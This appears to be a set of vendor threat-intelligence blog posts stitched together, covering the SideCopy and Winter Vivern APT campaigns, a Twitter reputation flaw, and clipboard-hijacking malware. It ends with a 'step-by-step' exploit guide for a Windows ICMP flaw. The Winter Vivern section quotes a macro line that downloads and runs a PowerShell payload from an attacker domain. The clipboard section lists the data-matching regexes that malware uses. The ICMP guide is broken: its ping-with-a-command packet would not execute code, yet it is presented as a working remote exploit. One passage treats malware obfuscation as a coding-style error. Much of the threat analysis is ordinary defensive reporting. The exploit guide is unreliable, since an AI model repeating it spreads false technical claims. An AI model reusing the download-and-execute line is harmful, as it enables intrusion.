The Vortex can be integrated with existing security infrastructure, allowing organizations to improve their threat detection and response capabilities, automate some analysis and mitigation tasks, and reduce the workload of human analysts. With its simple and cost-effective deployment options, Cyberstanc Vortex is an accessible solution for organizations of all sizes and industries.

At Cyberstanc, we are committed to ensuring a safer and more secure digital world for all.

Apart from our Vortex platform, we also provide the RIPx scanner and threat intelligence service. This powerful service is designed to provide real-time threat detection and analysis, using cutting-edge technology and threat intelligence. It has already been consumed by product-based companies, Auditors, Pen-testers and our threat intelligence partners and OEM clients providing them with comprehensive detection mechanism.

Is your organization ready to combat the evolving cyber threats? Contact us at Sales@cyberstanc.com to explore our advanced cybersecurity solutions. Our cutting-edge Vortex platform, AV/EDR companion, and more can protect your business. Schedule a in-house demo or meeting at https://cyberstanc.com/request-a-demo/ and secure your future.

Additionally, join us in shaping the future of cybersecurity technology through the exciting co-build opportunity offered by Vortex, the ultimate platform designed specifically for SOC teams, Threat Hunters, and Researchers.

With Vortex, you'll have all the tools you need to combat cyber threats at your fingertips. Experience its power with a 30-day freemium access, allowing you to explore its full capabilities.

Visit https://vortex.cyberstanc.com/ and Sign-up today!

Recently, a cyber espionage campaign was discovered which targeted Indian defence contractors, aerospace, and research organizations. This campaign used various tactics to compromise its victims and extract sensitive information.

In this blog, we will analyze the two tools used in this campaign - Action RAT and AllaKore RAT, examining their associated command and control (C2) infrastructure. We will also explore the threat telemetry data that surrounds these C2 servers and discuss how the attackers manage their infrastructure.

Overview of the Attack

In this attack, the SideCopy group used spear-phishing emails with LNK files in compressed packages as the attack entry point. The LNK file is a malicious file that accesses the command and control (C2) server using mshta.exe in the system to download and execute subsequent payloads. The final payload is an improved open-source Trojan horse written in Delphi or a new Trojan horse written in C++, with the bait content related to the Indian Ministry of Defense.

Spear-phishing and Compressed Packages: The old Tactics of SideCopy Group

The attack process is as follows:

Spear-phishing emails, with LNK files in compressed packages as the attack entry point.

Loading and executing subsequent payloads in memory without files.

The final payload is an improved open-source Trojan horse written in Delphi or a new Trojan horse written in C++.

The bait content is related to the Indian Ministry of Defense.

Outbound Activity Analysis of sidecopy's C2 Server

Phase One : SideCopy Group's Spear-Phishing Emails and Malicious Payloads

The SideCopy group has been using spear-phishing emails as the primary method to deliver their malicious payloads. In this attack activity, they used a compressed multiple package multiple-type "XYZ.zip," which contained a bait LNK file. The LNK file, when clicked, accessed the C2 using mshta.exe to download and execute subsequent payloads.

The link in the LNK file redirected to malicious site which downloaded a piece of JS code to execute. The main function of this JS code was to load DLL in memory, decrypt the embedded data in the JS code through the functions in the DLL, and drop the PDF bait. The function "openthefile" decrypted and released the PDF bait. The displayed PDF bait was related to the Indian Ministry of Defense.

file: ffa2e6f6a7a8001f56c352df43af3fe5 Cyber Advisory 2023.docm        

dl-url: http[:]//luckyoilpk[.]com/vlan.html payload

#ReverseRAT (aka #CetaRAT): 0baa1d0cc20d80fa47eeb764292b9e98 CnC: http[:]//185.174.102[.]54:443

The JS code also obtained the information of installed antivirus software, concatenated it with the string "anvaro =," and uploaded it to C2 server using the POST method.

It then created the directory "C:\ProgramData\ABC," accessed the C2 to download data, and saved it in "C:\ProgramData\ABC\jquery.hta" and "C:\ProgramData\ABC\jscy.hta" files, and then executed them.

Phase Two : The Aftermath of the Attack on Quick Heal and Other AV Software

The SearchProducts function compares the antivirus software to decide how to start the subsequent payloads. When the Indian antivirus software "Quick Heal" is present, the first step is to copy Credwiz.exe file in the system to the directory “C:\Users\Public\smitpr” and rename it as “crezly.exe”.

The code checks if the antivirus software is "Quick Heal." If it is, the function performs the following steps:

Copies the Credwiz.exe file to the directory "C:\Users\Public\smitpr" and renames it as "crezly.exe."

Decrypts the DLL data and renames it as "DUser.dll" in the "C:\Users\Public\smitpr" directory.

Decrypts the EXE data and drops the program "simsre.exe" in the "smitpr" directory.

Sleeps for 30 seconds.

Calls the released "crezly.exe" program to side-load the malicious "DUser.dll."

Generates a bat file to add a startup item for the crezly.exe program through the registry.

During the execution, a bat file was generated, which added a startup item for the crezly.exe program through the registry. When the antivirus software was Kaspersky, Avast, Bitdefender, WindowsDefender, or others, the way of releasing the malicious component was basically the same as that of the Indian antivirus software "Quick Heal," except that it slept for one minute and then started the released simsre.exe program directly, and the program added to the startup item through the registry was also simsre.exe.

If the antivirus software is not "Quick Heal," the function performs the following steps:

Sleeps for 1 minute.

Starts the released "simsre.exe" program directly.

Generates a bat file to add a startup item for the "simsre.exe" program through the registry.

Phase Three : AllaKore RAT's File Upload/Download: Accessing Sensitive Information Made Easy

AllaKore RAT, also known as Cyrus, is a remote access trojan that is commonly used by cybercriminals to gain unauthorized access to victim's computers. This RAT has been modified by the SideCopy group and is a variant of the open-source RAT that can bypass most antivirus and endpoint detection and response (EDR) tools. In this technical analysis, we will discuss the capabilities and techniques used by AllaKore RAT to evade detection.

Action RAT is a tool that is used to receive commands from the C2 server, retrieve information from the victim machine, execute further payloads, and upload information back to the C2.

It is dropped onto the victim machine alongside a benign executable which is used to sideload it, in order to avoid detection.

Capabilities of AllaKore RAT

AllaKore RAT has various capabilities that allow attackers to gain complete control over the victim's system.

Some of the main functions of AllaKore RAT are:

Keylogger: AllaKore RAT has a built-in keylogger that can log all the keystrokes made by the victim, including usernames, passwords, and other sensitive information.

Screenshots: AllaKore RAT can capture screenshots of the victim's desktop and send them back to the attacker's C&C server.

List folders and files: AllaKore RAT can list all the files and folders on the victim's computer, giving the attacker a clear idea of the victim's file structure.

Upload/download files: AllaKore RAT can upload and download files from the victim's computer, giving the attacker access to sensitive information.

Steal clipboard data: AllaKore RAT can steal data from the victim's clipboard, including passwords and other sensitive information.

Change wallpaper: AllaKore RAT can change the victim's desktop wallpaper to display a message from the attacker.

Remote control: AllaKore RAT allows the attacker to remotely control the victim's computer, giving them complete access to the system.

Techniques used by AllaKore RAT to evade detection

Code obfuscation: AllaKore RAT uses code obfuscation techniques to hide its malicious code from antivirus and EDR tools.

Fileless execution: AllaKore RAT can execute its code in memory, without creating any files on the victim's system.

Process injection: AllaKore RAT uses process injection techniques to inject its code into legitimate processes running on the victim's system.

C&C communication encryption: AllaKore RAT encrypts its communication with the C&C server using various encryption algorithms, making it difficult to detect its network traffic.

SideCopy Uncovers Transparent Tribe's Latest Cyber Espionage Plot with Indian MoD Theme

Two samples of Action RAT (loaded as DUser.dll).

Stage 1: feeadc91373732d65883c8351a6454a77a063ff5 (DRDO - K4 Missile Clean room.pptx.lnk)

Tags: mshta,lnk,html
www.cornerstonebeverly[.]org, ilovepdf[.]com

Action RAT: 3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5 (DUser.dll)

C2: 144.91.72.17:8080 (Contabo GmbH)

The other sample had the following details:

Stage 1: 0d68a135b1f4be18481cf44ed02bcbf82aeb542e (Cyber Advisory - Profiles (Pic and Mob No) of PIOs.docx.lnk)

C2: www.kwalityproducts[.]com

Action RAT: cb031561fd76643885671922db7d5b840060334d (DUser.dll)

C2: 84.46.250.78:8080 (Contabo GmbH)

Phase 4: Analysis of Outbound Activity from C2 Servers in Action RAT and AllaKore RAT Campaign

In early 2023, a targeted campaign using the Action RAT and AllaKore RAT malware was observed, with all 18 victims located in India. Initial victim connections to the command and control (C2) servers associated with Action RAT were observed on February 6 and March 15, respectively.

Further analysis of outbound activity from the C2 servers revealed connections to IMMEDION, a US provider, via 84.46.250.78. However, WHOIS data indicated that IMMEDION was located in Pakistan, suggesting that actors located in Pakistan were managing the infrastructure. Communication sourced from 17 distinct IPs assigned to Pakistani mobile providers and Proton VPN nodes were observed during the period of interest, indicating the threat actors accessed their infrastructure within a typical working week cadence.

The SideCopy malware campaign has been actively spreading in the wild, targeting victims in India and potentially other regions. The campaign utilizes a DLL-based malware loader and Indian Ministry of Defense-themed Trojan to compromise victims' systems and steal sensitive data.

Our closing remarks on SideCopy's cyber threats

In conclusion, the SideCopy group continues to pose a significant threat to organizations, particularly in India and other countries. Their use of sophisticated tactics such as spear-phishing emails and DLL-based malware loaders highlights their determination to evade detection and compromise their targets.

At Cyberstanc, we remain dedicated to researching and analyzing APT groups such as SideCopy, and providing our clients with advanced cybersecurity solutions to protect against emerging threats. Our Secure-Tech service offers comprehensive internal and third-party application scrutiny scans, using a convenient Pay-As-You-Go model.

SideCopy Trojan Dropper  : fa6c832e22f978b8210c0630db69e6a2

"https://polyswarm.network/scan/results/file/d3b0efc4efbef68c3a4bbc9a71b95ed186b3511141597a38071c51e1a9ad01b0"

We invite you to visit our blog for detailed analysis of APT36 Transparent Tribe and other threat actors, and to contact us at Sales@cyberstanc.com to learn more about how we can help protect your organization from cyber threats. Our cutting-edge technologies and commitment to cybersecurity make us a trusted partner in ensuring a safer and more secure digital world for all.

"https://cyberstanc.com/blog/a-look-into-apt36-transparent-tribe/"

IOC Information:

URLs:

https://kcps.edu[.]in/css/fonts/files/docs/graentsodocumentso/ganeshostwoso/snbtoolswires.hta

https://kcps.edu[.]in/css/fonts/files/avena/

https://kcps.edu[.]in/css/fonts/files/ntsfonts/

https://kcps.edu[.]in/css/fonts/files/jquery/

https://www[.]cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta

https://cornerstonebeverly[.]org/js/files/ntfonts/avena/

https://cornerstonebeverly[.]org/js/files/ntfonts/

https://hpuniversity[.]in/uploadsssss/files/file2/file2.zip

https://hpuniversity[.]in/uploadsssss/files/file3/file3.zip

https://hpuniversity[.]in/uploadsssss/files/women/Women.zip

https://hpuniversity[.]in/uploadsssss/files/survey/Survry.zip

http://hpuniversity[.]in/filessss/software/SoftWare.zip

https://hpuniversity[.]in/filessss/principles/Principles.zip

https://hpuniversity[.]in/documents/survey/start/2.hta

https://hpuniversity[.]in/documents/women/Women.zip

IPs:

89.117.63.146:9921

185.229.119.60:9134

144.91.72.17:8080

13.107.21.200

40.113.103.199

104.123.111.225

162.159.36.2

184.50.166.121

193.138.218.74

To better protect against this threat, it is important to stay informed about the latest developments and take proactive measures to defend against potential attacks. Researchers should monitor the IOC information provided and report any suspicious activity to relevant authorities.

In today's digital age, social media has become an integral part of our daily lives. Among them, Twitter stands out as a platform that enables users to express their opinions, engage with others, and get informed about the latest news and events worldwide.

However, with great power comes great responsibility, and Twitter's algorithm is no exception. In recent years, there have been growing concerns about the misuse of the Twitter algorithm to manipulate and hurt users' accounts' reputations without any recourse.

The discovery of the CVE-2023-29218 vulnerability in Twitter's code is a reminder that online platforms are not invulnerable to cyberattacks.

The response from Twitter CEO Elon Musk, offering a bounty for the conviction of those behind the botnets exploiting the vulnerability, highlights the seriousness of the situation.

It is a reminder that cybersecurity is a shared responsibility and that we all have a role to play in protecting ourselves and our communities.

This article sheds light on the potential dangers of the Twitter algorithm as a manipulative tool and highlights the growing concerns about the hurt users account reputations.

How the Twitter Algorithm Can Be Exploited

Twitter's algorithm chooses tweets based on a collection of core models and features that extract latent information from tweet, user, and engagement data.

Twitter's timeline involves three major stages in the recommendation pipeline: candidate sourcing, machine learning algorithm ranking, and filters and heuristics usage.

The service in charge of creating and delivering the schedule is Home Mixer, which is the technological framework that links various potential sources, scoring formulas, heuristics, and filters.

The Twitter algorithm uses in-network and out-of-network sources to select the top 1500 tweets for each request from a group of hundreds of millions.

The embedding space methods create numerical representations of users’ interests and Tweets’ substance to respond to the more broad inquiry about content similarity.

The timeline’s objective is to provide pertinent Tweets by ranking them based on scoring, which serves as a direct predictor of each prospective Tweet’s relevance.

The problem with the current implementation of the Twitter algorithm is that all penalties are applied at the account level, regardless of the content's nature. This means that even if the reported content is entirely legitimate, the account owner still suffers the consequences.

The process of exploiting the Twitter algorithm is quite straightforward. First, a group of users with similar views needs to be organized. They then find a target and execute the following tasks in order: follow in preparation, unfollow a few days later, report a few "borderline" posts, mute, and block.

This coordinated effort results in a global penalty being applied to the target's account, significantly hurting its reputation and visibility.

The Vulnerabilities in the Twitter Algorithm

Twitter, one of the world's most popular social media platforms, has recently been hit with a new security vulnerability, CVE-2023-29218, which allows attackers to manipulate its recommendation algorithm using mass blocking actions from multiple bot-created accounts.

This flaw has the potential to suppress specific users from appearing in people's feeds by artificially driving down their reputation scores, causing a denial of service.

Moreover, the penalties accumulate over time and survive the actual tweet, making them even more dangerous. No matter how much the account owner tries to boost their visibility, with enough people applying enough signals, the multiplier gets incredibly low, making it impossible to reverse the damage.

To make matters worse, there are apps and websites like BlockParty, Reddit's GamerGhazi, and BlockTogether that enable users to build, organize, and weaponize this behavior. BlockTogether, for instance, had 303,000 registered users, with 198,000 users subscribing to at least one list and 4.5 billion actions.

"The Twitter Recommendation Algorithm through ec83d01 allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking, and reporting, as exploited in the wild in March and April 2023."

Twitter's recommendation algorithm uses machine learning to suggest content to users. The algorithm takes into account various factors such as a user's activity, who they follow, and what they interact with. It then suggests content to the user based on these factors.

The vulnerability lies in the algorithm's implementation. Twitter's algorithm takes into account negative signals such as unfollows, muting, and blocking as a factor in determining a user's reputation score. This means that if multiple accounts coordinate negative actions against a target account, it can artificially drive down the user's reputation score, resulting in the user's content being suppressed from appearing in Twitter's recommendation engine.

This vulnerability could be dangerous for users, as it can be exploited to manipulate the algorithm and artificially suppress a user's content. This could result in significant harm to the user's reputation, online presence, and potentially their career.

As a result, the user's content would be suppressed from appearing in people's feeds and the recommendation engine, ultimately harming the user's online presence and potentially leading to a loss of followers and engagement.

The vulnerability was caused by a bug in the recommendation algorithm's code, which allowed negative actions to be coordinated and amplified by botnet armies. The code was identified as ec83d01, and the flaw has since been patched by Twitter.

The problem: Blocking large numbers of people on social media reduces diversity in discussion.

To address this problem, one possible solution is to implement a reputation-based system that rewards users with high credibility and penalizes those with low credibility.

The algorithm could take into account various factors such as the age of the account, the frequency of posts, the number of followers, the number of likes and retweets, and the engagement rate. Users with high credibility scores would receive a boost in their posts' visibility, while users with low credibility scores would experience a downgrade.

To further discourage the creation of fake accounts, the algorithm could also impose a penalty on accounts that are suspected of being fake or engaging in malicious activities.

For instance, accounts that are reported by multiple users or flagged by automated systems could receive a temporary ban or a permanent suspension.

Here's an example of how the algorithm could work:

• User A has an account that is one year old, has 5,000 followers, and averages 100 likes and 50 retweets per post. User A's engagement rate is calculated as (100+50)/(5,000)=0.03, and the credibility score is assigned as 80 out of 100.
• User B has an account that is one month old, has 100 followers, and averages 1 like and 0 retweets per post. User B's engagement rate is calculated as (1+0)/(100)=0.01, and the credibility score is assigned as 20 out of 100.
• User C has an account that is suspected of being fake, has 10,000 followers, and averages 1,000 likes and 500 retweets per post. User C's engagement rate is calculated as (1,000+500)/(10,000)=0.15, but the credibility score is penalized as 30 out of 100 due to suspicious activity.

In this example, User A would receive a small boost in their posts' visibility, User B would receive a significant downgrade, and User C would receive a severe penalty. This algorithm could incentivize users to create authentic and credible accounts and discourage malicious behavior on Twitter.

Twitter Takes Control of Its Platform with New House-Keeping Initiatives

As a leading social media platform, Twitter has a responsibility to protect its users from abuse, harassment, and manipulation. The company must take proactive steps to address the vulnerabilities in its algorithm and ensure that it cannot be exploited to hurt users' accounts' reputations.

This includes implementing measures to prevent coordinated attacks, improving the transparency of the algorithm, and providing users with more control over their accounts' visibility.

Twitter is not the only tech giant that has faced criticism for its algorithmic practices. Algorithmic bias has been a hot topic in recent years, with many calling for greater transparency and accountability in the algorithms used by tech companies.

Google has also faced criticism for its algorithmic practices. In 2020, a study found that Google's search algorithm prioritized its own products and services over those of its competitors. This led to an antitrust lawsuit being filed against Google by the U.S. Department of Justice.

Similarly, Facebook has faced criticism for its algorithmic practices. The company has been accused of amplifying extremist content and allowing false information to spread. In response, Facebook has made changes to its algorithm to prioritize content from reputable sources.

Conclusion

In conclusion, the Twitter algorithm can be a powerful tool for users to engage with others, express their opinions, and get informed about the latest news and events. However, it can also be a dangerous weapon in the hands of manipulators who seek to hurt, silence, or undermine other users' accounts.

"https://github.com/twitter/the-algorithm"

If you're interested in learning more about the technical aspects of these solutions or need assistance with cybersecurity practices, be sure to reach out to the experts at Cyberstanc. Our team of professionals can provide you with the latest information and best practices for online safety and security. You can contact at training@cyberstanc.com for more information.

Together, we can make social media a safer and more productive space for everyone. Let's continue to work towards a brighter and more secure digital future.

The Emergence of Clipboard Injection Attacks:

Clipboard injection attacks have emerged as a threat to cryptocurrency and banking users. This technique, which is more than a decade old, relies on malware replacing part of the clipboard contents once it detects a wallet address in it.

Despite the attack being fundamentally simple, it harbors more danger than would seem. This blog post will delve into clipboard injection attacks, including their nature of work, malware execution, and how Scrutiny engine can detect all attacks at an early stage with reliability.

Clipboard injection attacks are not new, as they started with banking trojans that targeted specific banks in 2013 by replacing bank account numbers in the clipboard.

The use of regular expressions is a common technique used by malware developers to scan through large amounts of data and find specific patterns. In this case, the malware is scanning for wallet IDs, which are used to transfer funds from one account to another.

How Clipboard Injection Attacks Work:

The attack works by inserting malware into the victim's device, which then monitors the clipboard for specific data, such as cryptocurrency wallet addresses, bank account numbers, or login credentials.

Once the malware detects the desired information in the clipboard, it replaces it with fraudulent data, redirecting the victim's funds to the attacker's account. This tactic has been widely used by hackers to carry out various types of scams, including cryptocurrency theft, identity theft, and financial fraud.

Malware installed with Enigma packer v4.0

Malware integrates into Windows clipboard viewers

Malware scans clipboard for regular expressions

If match found, replace with random address

Hardcoded list of thousands of replacement addresses.

Since then, hackers have found various ways to exploit the copy-paste function for stealing sensitive data. US bank account numbers, IBANs, SWIFT/BIC codes, credit card numbers, social security numbers, Canadian social insurance numbers, UK national insurance numbers, and even PayPal account emails are all at risk.

US bank account number: \b\d{9}\b

IBAN (International Bank Account Number): \b[A-Z]{2}\d{2}[A-Z]{4}\d{7}([A-Z\d]?){0,16}\b

SWIFT/BIC code: \b[A-Z]{6}[A-Z\d]{2}([A-Z\d]{3})?\b

Credit card number: \b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b

Social Security number (US): \b\d{3}[- ]?\d{2}[- ]?\d{4}\b

Canadian Social Insurance Number: \b\d{3}[- ]?\d{3}[- ]?\d{3}\b

UK National Insurance Number: \b[A-Z]{2}\d{6}[A-Z]?\b

PayPal account email: \b[A-Za-z\d._%+-]+@[A-Za-z\d.-]+.[A-Za-z]{2,}\b

Adding increased value of cryptocurrencies made it a very lucrative target. This is where the first clipboard attacks on cryptocurrency owners began to emerge. Hackers would replace the wallet addresses in the clipboard with their own, resulting in the victim transferring their cryptocurrency into the attacker's wallet.

(^|\s)1[1-9A-HJ-NP-Za-km-z]{25,34}($|\s) – Bitcoin (P2PKH)

(^|\s)3[1-9A-HJ-NP-Za-km-z]{25,34}($|\s) – Bitcoin (P2SH)

(^|\s)bcrt1[ac-hj-np-z02-9]{7,71}($|\s) – Bitcoin (Bech32)

(^|\s)X[1-9A-HJ-NP-Za-km-z]{24,34}($|\s) – Ripple

(^|\s)0x([A-Fa-f0-9]{40})\b – Ethereum

(^|\s)[TM]{1}[a-zA-Z0-9]{33}($|\s) – Tether

(^|\s)N[1-9A-HJ-NP-Za-km-z]{32,33}($|\s) – NEM

(^|\s)bnb[1-9A-HJ-NP-Za-km-z]{38}($|\s) – Binance Coin

Once the malware identifies a cryptocurrency wallet address, it replaces it with an address that is controlled by the attacker. The replacement address is typically a different cryptocurrency wallet that belongs to the attacker. When the user pastes the wallet address into a cryptocurrency transfer, the transaction is sent to the attacker's wallet instead of the intended recipient.

The hexdump of the malware data reveals the use of regular expressions and replacement wallet IDs to hide the malicious code's true purpose.

This technique is effective because it does not require the malware to actively communicate with a remote server. It operates entirely within the user's system and relies on the user to perform an action, such as pasting a wallet address into a cryptocurrency transfer. As a result, this technique is difficult to detect by traditional security measures.

Detecting Clipboard Injection Attacks:

Clipboard injection attacks are a sophisticated form of malware that are difficult to detect using traditional security measures. However, through the use of advanced threat intelligence and simulation intelligence, detecting these attacks is possible.

Threat intelligence involves the collection and analysis of data on emerging threats to identify patterns and behaviors that indicate clipboard injection attacks. This includes analyzing data on malware campaigns, tracking the activities of threat actors, and monitoring vulnerabilities in software and systems.

Simulation intelligence, on the other hand, involves the creation of simulated attack scenarios to test the effectiveness of security measures in detecting and preventing clipboard injection attacks.

Together, these techniques provide a powerful defense against clipboard injection attacks. By staying vigilant and leveraging advanced threat intelligence and simulation intelligence, security teams can detect these attacks early and prevent significant damage to their systems and data.

"https://polyswarm.network/scan/results/file/13d9399c999232ee4fc8b666b68e37ce277d8186c3a25448a5d146c1b7100a8a"

"https://polyswarm.network/scan/results/file/b12de973c65c13c17ec5388f200c1141aa2dbd209bd980399bbefae2d35082dc"

Enigma Packer: A Cryptographic Tool for Malware Protection and Obfuscation

Clipboard injection attacks can also be connected to the Enigma packer, a cryptographic tool commonly used by malware developers. By using clipboard injection attacks in combination with the Enigma packer, cybercriminals can further protect their malicious activities and make it even harder for security software to detect and prevent their attacks.

The Enigma packer employs various cryptography functions, such as AES and RSA, to encrypt the malware code and make it harder to analyze or detect.

The Enigma packer is often sold on underground forums and is popular among malware coders and cybercriminals. It is commonly used in Advanced Persistent Threats (APTs), which are long-term, targeted attacks aimed at stealing sensitive information or disrupting critical infrastructure.

"https://polyswarm.network/scan/results/file/870d5329623782504b91d4b52b1b7905730f28b4cf62873de444921510f1f679"

The Danger of Clipboard Injection Attacks:

Clipboard injection attacks are a type of malware that can remain undetected for long periods of time, posing a significant risk to users' sensitive data. Unlike other malware that is typically discovered through obvious signs of activity or associations with known bad infrastructure, clipboard injectors only activate when certain conditions are met, such as the presence of specific data in the clipboard.

This makes them particularly dangerous, as they can quietly sit on a system for years, waiting for the right opportunity to strike. To protect against clipboard injection attacks, it's essential to use a combination of techniques, including monitoring system activity, using anti-malware software, and employing cryptography to protect sensitive data.

Cryptography functions such as hashing and encryption can be especially effective in protecting against these attacks. By encrypting or hashing sensitive data like wallet IDs, it becomes much more difficult for attackers to read or manipulate the information.

One way to mitigate this type of malware is to verify the accuracy of the wallet address before sending any cryptocurrency. Users can double-check the wallet address by comparing it to a trusted source or using a hardware wallet that displays the address on its screen.

Additionally, implementing two-factor authentication (2FA) can provide an additional layer of security, making it more difficult for attackers to gain access to cryptocurrency wallets.

At Cyberstanc, we understand the risks posed by clipboard injection attacks and can help you protect your sensitive data. Contact us today at sales@cyberstanc.com to learn more about our cybersecurity solutions.

Winter Vivren APT Group is a politically motivated cyber threat APT that has been active since at least December 2020. The group has remained out of the public eye since its inception, but it resurfaced in recent months with campaigns against government agencies and individuals in Italy, India, Poland, and Ukraine.

Winter Vivren is also known as UAC-0114 and is classified as an advanced persistent threat (APT).

Winter Vivren primarily targets governmental organizations and its TTP involves seeking initial access primarily through phishing lures, document exploits, fake removable (USB) devices, DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.

The group has remained out of the public eye for many years, until the recent attacks against Ukrainian and Polish government targets inspired reports on resurgent activity earlier this year from the Central Cybercrime Bureau of Poland and the State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine.

The Winter Vivren story is scattered and leads to a somewhat confused profile!

Winter Vivern's Targeting of Indian Government Sites

Winter Vivern targeted individual members of the Indian government in their recent campaign. The group's phishing emails impersonated government officials and organizations, including the Ministry of Home Affairs, to trick victims into clicking on a malicious link. The link led to a fake login page that prompted the user to enter their credentials.

The group registered multiple domains that resembled legitimate government websites, such as "https://www.mha.gov.in/," which was used in their campaign. Winter Vivern created multiple phishing sites that were used in their attack, including "https://mha-gov.in/," "https://mha-home-affairs.in/," and "https://mha-nic.in/." These phishing sites were designed to look like the legitimate Ministry of Home Affairs website, complete with the official logo and other visual elements.

Once the victim entered their credentials into the fake login page, Winter Vivern harvested the information and used it to gain access to the victim's email account. The group then used the compromised email accounts to send phishing emails to other targets within the organization, further expanding their access.

Victims who download the fake software from the fake government domain will see what appears to be an actual antivirus running, when, in fact, a malicious payload is being downloaded in the background.

The group has also been known to use macros in Microsoft Excel files and relies on shared toolkits and the abuse of legitimate Windows tools to compromise organizations beyond the theft of legitimate credentials.

XLM macros are made up of functions, arguments, and operators. The error message we are discussing indicates a problem with an operator. Specifically, the "CMPOP" operator, which is used to compare two values.

Issue: The error message "Unexpected token Token('CMPOP', '=')" occurs when Excel encounters an unexpected operator in an XLM macro. In this case, the unexpected operator is the equals sign (=).

The error message also indicates that the error occurred at line 1, column 221, and that Excel was expecting the end of the XLM macro ($END) instead of the equals sign.

The XLM macro causing this error includes a long string of padding, which appears to be an attempt to obfuscate the macro. The padding includes multiple occurrences of the "=RAND()=SUMPRODUCT(54623,42,452,452,452)" expression, which generates a random number and multiplies it by a set of constants.

Solution: The simplest solution to this error is to remove the padding from the XLM macro. This can be done by searching for the padding string "= ""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&""=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)", and replacing it with an empty string.

In addition, it is recommended to avoid the use of obfuscation techniques in XLM macros, as they can make it difficult to understand and maintain the code. Instead, XLM macros should be well-documented and written in a clear and concise manner.

The error message "Unexpected token Token('CMPOP', '=')" indicates a problem with an operator in an XLM macro in Excel. Specifically, the equals sign (=) is being used in an unexpected way. The error can be resolved by removing the padding from the XLM macro and avoiding the use of obfuscation techniques. It is important to write XLM macros in a clear and concise

Winter Vivern disguises its malware as antivirus software, pitching the fake scanners through email to targets as government notices. These notices instruct recipients to scan their machines with this supposed antivirus software. Victims who download the fake software from the fake government domain will see what appears to be an actual antivirus running, when, in fact, a malicious payload is being downloaded in the background.

Winter Vivern's primary payload in recent months has been Aperitif, a Trojan that collects details about victims, establishes persistence on a target machine, and beacons out to an attacker-controlled command-and-control server (C2). The group also resorts to old favorites such as macro-enabled Microsoft Excel files. When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits and the abuse of legitimate Windows tools.

CALL("kernel32","WinExec","JCJ","powershell  -c ""iex (New-Object Net.Webclient).DownloadString( 'https://secure-daddy[.]com/wintervivern/server/serverHttpRequest(RUN).txt')""",0)

Winter Vivern's tactics and techniques have allowed them to remain under the radar, despite their recent targeting of government agencies and individuals. The group's resourcefulness and ability to accomplish a lot with potentially limited resources make them a formidable threat, even though they lack the resources of other Russian-speaking APT groups.

It remains to be seen if Winter Vivern will continue to fly under the radar or if they will become a more significant threat in the future.

Recently, a new critical vulnerability was discovered in the Internet Control Message Protocol (ICMP) implementation of Microsoft Windows operating system. The vulnerability has been assigned CVE-2023-23415 and is considered to have a high impact as it allows for remote code execution on the targeted system. In this blog post, we will explore this new vulnerability in detail and provide a step-by-step guide to exploit it.

CVE-2023-23415 Technical Details:

The vulnerability in question exists in the way Microsoft Windows handles incoming ICMP messages. An attacker can send a specially crafted ICMP message to the target system that can trigger a buffer overflow in the ICMP implementation code, leading to remote code execution. The vulnerability has been given a CVSS score of 9.8 out of 10, which indicates a critical level of severity.

Exploiting CVE-2023-23415:

To exploit this vulnerability, an attacker needs to send a specially crafted ICMP message to the target system. The payload of the ICMP message needs to be crafted in such a way that it overflows the buffer in the ICMP implementation code. Once the buffer is overflowed, the attacker can execute arbitrary code on the target system with the same privileges as the ICMP implementation code.

Step 1: Setting Up the Attacker Machine

First, we need to set up an attacker machine that will send the malicious ICMP message to the target system. We will be using Kali Linux as our attacker machine. Open the terminal on the Kali Linux machine and type the following command to update the system:

sudo apt update && sudo apt upgrade

Step 2: Installing Scapy

Scapy is a powerful Python-based packet manipulation tool that we will be using to craft the malicious ICMP message. To install Scapy, type the following command in the terminal:

sudo apt install python-scapy

Step 3: Crafting the Malicious ICMP Message

from scapy.all import *

ip = IP(dst="target_ip")
icmp = ICMP(type=8, code=0)
payload = "cmd.exe /c calc.exe"  # payload for RCE

packet = ip/icmp/payload
send(packet)

Once Scapy is started, type the following command to create the ICMP message:

icmp_pkt = IP(dst="TARGET_IP")/ICMP()/("A" * 1024)

Replace TARGET_IP with the IP address of the target system. The payload of the ICMP message is set to "A" * 1024, which will overflow the buffer in the ICMP implementation code. You can adjust the length of the payload as per your requirements.

Step 4: Sending the Malicious ICMP Message

Once the ICMP message is crafted, we can send it to the target system using the following command:

send(icmp_pkt)

This will send the malicious ICMP message to the target system, triggering the vulnerability and allowing us to execute arbitrary code on the target system.

ICMP Prevention:

By following these steps, you can help protect your network from ICMP attacks and keep your system secure.

Disable ICMP: One way to prevent ICMP attacks is to disable ICMP echo requests on the firewall or router. This will prevent attackers from sending large amounts of ICMP traffic to your network.

Filter ICMP traffic: Another way to prevent ICMP attacks is to filter ICMP traffic. Firewalls can be set up to only allow specific types of ICMP traffic to enter the network, blocking all others.

Rate Limit ICMP traffic: You can also rate limit ICMP traffic to prevent an attacker from sending a large number of requests at once. By limiting the amount of ICMP traffic that can enter the network, you can prevent an attack from overwhelming the network.

Use a network security solution: Implementing a network security solution, such as an intrusion detection and prevention system, can help detect and prevent ICMP attacks by identifying and blocking suspicious traffic.

Conclusion:

In conclusion, the new ICMP vulnerability in Microsoft Windows poses a serious threat as it allows for remote code execution on the targeted system.

It is recommended that users apply the patch released by Microsoft to mitigate the vulnerability. It is also recommended to restrict incoming ICMP messages on the network perimeter to reduce the attack surface.

Reference used in: https://arxiv.org/pdf/2312.06875